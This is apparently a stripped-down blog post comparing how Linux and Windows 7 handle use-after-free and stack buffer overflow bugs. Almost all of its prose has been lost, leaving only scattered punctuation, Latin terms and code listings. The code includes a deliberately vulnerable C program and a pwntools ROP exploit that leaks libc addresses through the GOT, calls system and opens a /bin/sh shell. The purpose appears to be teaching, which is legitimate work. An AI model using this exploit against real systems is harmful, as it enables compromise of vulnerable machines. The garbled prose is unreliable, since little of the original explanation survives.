, , : ? ? ? : , .
Disclamer: . , .
- , . : , , . : , . , , , ββ - . : ++.
- , . , , , . - , . 6 (89, 90, 95, 99, 11, 18).
undefined behavior, , . undefined behavior , . , , , /, . :
Race Condition
Integer Overflow
Buffer Overflow
β¦.
, β β . , .
. , Linux , , . Windows, . ? . Linux , , - .
- Stack Buffer Overflow UAF. ? :
;
;
, - , ( ).
Windows 7 x86 Kali Linux.
: UAF
Windows ( ), UAF. Linux. : Windows, Linux, .
: UAF
:
#include <malloc.h>
#include <stdio.h>
typedef struct UAFME {
void (*vulnfunc)();
} UAFME;
void first(){
printf(βIt is First\n");
}
void second(){
printf(βIt is second\n");
}
int main(int argc, const char * argv[]){
UAFME *malloc1 = malloc(sizeof(UAFME)); //Allocate struct
malloc1->vulnfunc = first;
printf("[i] first at %p\n", first);
printf("[i] second at %p\n", second);
printf("[i] Calling malloc1's vulnfunc: \n");
malloc1->vulnfunc();
free(malloc1);//error here
long *malloc2 = malloc(0);
*malloc2 = (long)second;
malloc1->vulnfunc();//trigger UAF
}
Windows Linux:
Linux:
Windows:
: UAF
UAF . , - . , Windows Linux : , . , . - , , .
: Stack Buffer Overflow
, . Stack Buffer Overflow , , , , , . .
: Stack Buffer Overflow
:
#include <stdio.h>
#include <unistd.h>
void vuln(){
char buf[50];
read(0, buf, 256);
}
void main(){
write(1,βHello Overflow\n",10);
vuln();
}
Linux Windows:
, . Linux checksec
.
Windows , . EMET. :
, , .
: Stack Buffer Overflow
. , Linux, , - βNX Bitβ. ROP. - pwntools Python. Linux :
from pwn import *
from struct import *
binsh = "/bin/sh"
stdin = 0
stdout = 1
read_plt = 0x8048300
read_got = 0x804a00c
write_plt = 0x8048320
write_got = 0x804a014
#32bit OS - /lib/i386-linux-gnu/libc-2.23.so
read_system_offset = 0x9ad60
#64bit OS - /lib32/libc-2.23.so
#read_system_offset = 0x99a10
writableArea = 0x0804a020
pppr = 0x80484e9
payload = "A"*62
#read(0,writableArea,len(str(binsh)))
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(stdin)
payload += p32(writableArea)
payload += p32(len(str(binsh)))
#write(1,read_got,len(str(read_got)))
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(stdout)
payload += p32(read_got)
payload += p32(4)
#read(0,read_got,len(str(read_got)))
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(stdin)
payload += p32(read_got)
payload += p32(len(str(read_got)))
#system(writableArea)
payload += p32(read_plt)
payload += p32(0xaaaabbbb)
payload += p32(writableArea)
r = process('./test2')
r.recvn(10)
r.send(payload + '\n')
r.send(binsh)
read = u32(r.recvn(4,timeout=1))
system_addr = read - read_system_offset
r.send(p32(system_addr))
r.interactive()
Windows c ROP . .
. : SimExecFlow, DEP, SEHOP.
, Linux Windows : Linux , Windows . , Linux , Windows .
Administrator Linux. Basic OTUS. - .
